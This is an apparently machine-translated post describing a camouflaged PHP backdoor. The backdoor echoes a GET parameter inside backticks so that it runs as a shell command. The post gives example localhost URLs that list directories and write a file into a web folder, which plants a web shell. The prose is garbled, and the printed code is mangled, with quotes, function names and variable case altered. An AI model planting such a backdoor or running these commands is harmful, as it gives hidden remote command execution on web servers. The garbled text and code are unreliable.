Occasionally see a paragraph, it seems that there is no problem, it is a fatal backdoor code, here used a general phper not pay attention to the reverse apostrophe ', the reverse apostrophe contains strings, equivalent to the Shell_exec function.
Camouflage is very good, easy to be ignored by the administrator.
$selfNums = $_get[' R '];
if (Isset ($selfNums)) {
echo ' $selfNums ';
}
Just see this code I think everyone will say no problem, but careful friends will find that the following variables are wrapped in a symbol, since it is a variable why this,
And it's not a single quote, this is the key, the symbol is a key below ESC (in exclamation point!). Next to the),
Through echo ' System command '; Can reach system (); The same effect
If you don't believe a friend can test
Http://127.0.0.1/t.php?r=dir can list directories
Http://127.0.0.1/t.php?r=echo, I'm Ma >>d:\web\90sec.php.
I used Appserv and the virtual host has been tested successfully.